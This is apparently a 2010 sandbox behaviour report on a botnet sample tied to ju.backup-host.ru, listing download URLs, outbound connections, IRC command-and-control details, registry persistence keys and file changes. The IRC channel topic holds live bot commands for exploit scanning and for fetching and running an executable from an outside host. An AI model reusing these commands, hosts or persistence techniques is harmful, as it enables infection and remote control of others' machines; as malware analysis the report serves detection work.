ju.backup-host.ru(45k bots)

By Pig, January 25, 2010

193.104.27.98 193.104.27.98
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1036
Send Datagram: 9 packet(s) of size 1
Recv Datagram: 9 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.10.2
10.1.10.1 10.1.10.1
wpad
193.104.27.98 193.104.27.98
193.104.27.107 193.104.27.107
Opened listening TCP connection on port: 11230
Download URLs
http://193.104.27.98/fox.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.107 TCP port 443
Outgoing connection to remote server: 193.104.27.107 TCP port 443
DNS Lookup
Host Name IP Address
0 127.0.0.1
dell-d3e62f7e26 10.1.10.2
193.104.27.98 193.104.27.98
ju.backup-host.ru 218.61.22.10
fr.ukbues.su
fr.ukbues.su 67.214.175.92
www.cship.info
www.cship.info 87.98.247.2
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1038
Send Datagram: 82 packet(s) of size 1
Recv Datagram: 82 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
http://67.214.175.92/n.php (fr.ukbues.su)
http://67.214.175.92/?path=n.php%3f (fr.ukbues.su)
http://67.214.175.92/n.php (fr.ukbues.su)
http://67.214.175.92/?path=n.php%3f (fr.ukbues.su)
http://67.214.175.92/?path=n.php%3f (fr.ukbues.su)
http://87.98.247.2/azenv.php/n.php (www.cship.info)
http://87.98.247.2/azenv.php/n.php (www.cship.info)
http://87.98.247.2/azenv.php/n.php (www.cship.info)
Outgoing connection to remote server: 193.104.27.98 TCP port 80

* C&C Server: 218.61.22.10:1863
* Server Password:
* Username: SP3-323
* Nickname: [N00_DEU_XP_3610696]_CHAR(0x08)_ä@
* Channel: #tom (Password: open)
* Channeltopic: :.asc -S|.http http://rapidshare.com/files/340552045/tomd|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://62.212.91.24/hh.exe C:munit.exe 1

Outgoing connection to remote server: fr.ukbues.su TCP port 80
Outgoing connection to remote server: fr.ukbues.su TCP port 80
Outgoing connection to remote server: fr.ukbues.su TCP port 80
Outgoing connection to remote server: fr.ukbues.su TCP port 80
Outgoing connection to remote server: fr.ukbues.su TCP port 80
Outgoing connection to remote server: www.cship.info TCP port 80
Outgoing connection to remote server: www.cship.info TCP port 80
Outgoing connection to remote server: www.cship.info TCP port 80

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Setup” = C:WINDOWSwin7.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Microsoft Driver Setup” = C:WINDOWSwin7.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “Guid” = 8aefce96-4618-42ff-a057-3536aa78233e
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{19127AD2-394B-70F5-C650-B97867BAA1F7} “{23343233-2C66-3B33-3432-343233343233}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoft “” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “userinit” = C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32sdra64.exe,
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem “EnableLUA”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionApp PathsIEXPLORE.EXE “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography “MachineGuid”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “DefaultLaunchPermission”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MachineLaunchRestriction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MachineAccessRestriction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “ActivationFailureLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “CallFailureLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “InvalidSecurityDescriptorLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “DisableActivationSecurityCheck”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpc “DCOM Security”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “EnableDCOM”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “EnableDCOMHTTP”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “IgnoreServerExceptions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “BreakOnSilencedServerExceptions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyAuthenticationService”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyAuthenticationLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyImpersonationLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyMutualAuthentication”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacySecureReferences”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “UseSharedWowVDM”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MaxActivationRetriesPerServer”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “PreferUnsecureActivation”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “AllowMultipleTSSessions”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerLicensing Core “EnableConcurrentSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesssvchostDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}{5D19E473-BE30-416B-B5C7-D8A091C41D2F}Connection “Name”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{3039636B-5F3D-6C64-6675-696870667265}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{3039636B-5F3D-6C64-6675-696870667265}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{3039636B-5F3D-6C64-6675-696870667265}”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRDPNPNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWebClientNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceslanmanworkstationNetworkProvider “Name”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{19127AD2-394B-70F5-C650-B97867BAA1F7} “{21323133-4B4A-686E-646B-6D6E69686A64}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem “EnableLUA”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionApp PathsIEXPLORE.EXE “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “userinit”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “BackoffOnUserActivityInterval1”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “BackoffOnUserActivityInterval2”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “DebugFilters”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ObsoleteTempFilesAge”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “FilterDaemonMsToIdle”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ConnectTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “DataTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “UseProxy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “LocalByPassProxy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “PortNumber”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ProxyName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ByPassList”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile “ProgID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile “Prefix”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “Mapi”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGatherWindowsSystemIndexProtocolsMapi “LogLevel.MAPI”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsWindows SearchPreferences “PreventIndexingOutlook”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “OutlookExpress”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “OTFS”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGatherWindowsSystemIndexProtocolsMapi “LogLevel.UNCFATPHLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “MaxGrowFactor”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “PerformanceLevel”
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “MaxMSinFilter”
Enums HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile
HKEY_CURRENT_USERIdentities

File Changes by all processes
New Files DeviceTcp
DeviceIp
DeviceIp
C:WINDOWSwin7.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
DeviceTcp6
DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F}
C:WINDOWSsystem32lowseclocal.ds
C:WINDOWSsystem32lowsecuser.ds.lll
C:WINDOWSsystem32lowsecuser.ds.lll
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
C:Windowslogfile32.txt
C:WINDOWSsystem32sdra64.exe
Opened Files .PIPElsarpc
.Ip
c:autoexec.bat
.PIPEROUTER
C:WINDOWSRegistrationR000000000007.clb
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWS
c:autoexec.bat
.PIPEROUTER
.Ip
.Ip6
.pipe_AVIRA_2109
.pipe_AVIRA_2108
C:WINDOWSsystem32lowseclocal.ds
DeviceRdpDr
.PIPEwkssvc
.shadow
.PIPEDAV RPC SERVICE
.PIPElsarpc
.Ip
c:autoexec.bat
C:Windowslogfile32.txt
.PIPEROUTER
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.pipe_AVIRA_2108
.PIPElsarpc
C:WINDOWSsystem32sdra64.exe
C:WINDOWSsystem32ntdll.dll
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.PIPElsarpc
.pipe_AVIRA_2108
C:WINDOWSRegistrationR000000000007.clb
c:Dokumente und EinstellungenAdministratorntuser.ini
.PIPElsarpc
.pipe_AVIRA_2108
C:WINDOWSRegistrationR000000000007.clb
Deleted Files C:WINDOWSsystem32lowseclocal.ds
C:WINDOWSsystem32lowsecuser.ds.lll
C:WINDOWSsystem32sdra64.exe
C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftSearchDataTempusgthrsvcPerflib_Perfdata_7c.dat
Chronological Order Open File: .PIPElsarpc (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Get File Attributes: C:WINDOWSwin7.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:b2012b95e8055db6ef1a06cc02f731be to C:WINDOWSwin7.exe
Set File Attributes: C:WINDOWSwin7.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWS ()
Find File: C:WINDOWSwin7.exe
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:WINDOWSsystem32configsystemprofileAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: .PIPEROUTER (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
Create/Open File: DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F} (OPEN_ALWAYS)
Open File: .Ip6 (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32lowsec Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: .pipe_AVIRA_2109 (OPEN_EXISTING)
Set File Attributes: C:WINDOWSsystem32lowseclocal.ds Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32lowseclocal.ds
Create File: C:WINDOWSsystem32lowseclocal.ds
Find File: C:WINDOWSsystem32lowsecuser.ds.lll
Open File: .pipe_AVIRA_2108 (OPEN_EXISTING)
Open File: C:WINDOWSsystem32lowseclocal.ds (OPEN_EXISTING)
Find File: C:WINDOWSsystem32lowsecuser.ds
Move File: C:WINDOWSsystem32lowsecuser.ds to C:WINDOWSsystem32lowsecuser.ds.lll
Create/Open File: C:WINDOWSsystem32lowsecuser.ds.lll (OPEN_ALWAYS)
Set File Attributes: C:WINDOWSsystem32lowsecuser.ds.lll Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Delete File: C:WINDOWSsystem32lowsecuser.ds.lll
Open File: DeviceRdpDr ()
Open File: .PIPEwkssvc (OPEN_EXISTING)
Open File: .shadow (OPEN_EXISTING)
Open File: .PIPEDAV RPC SERVICE (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
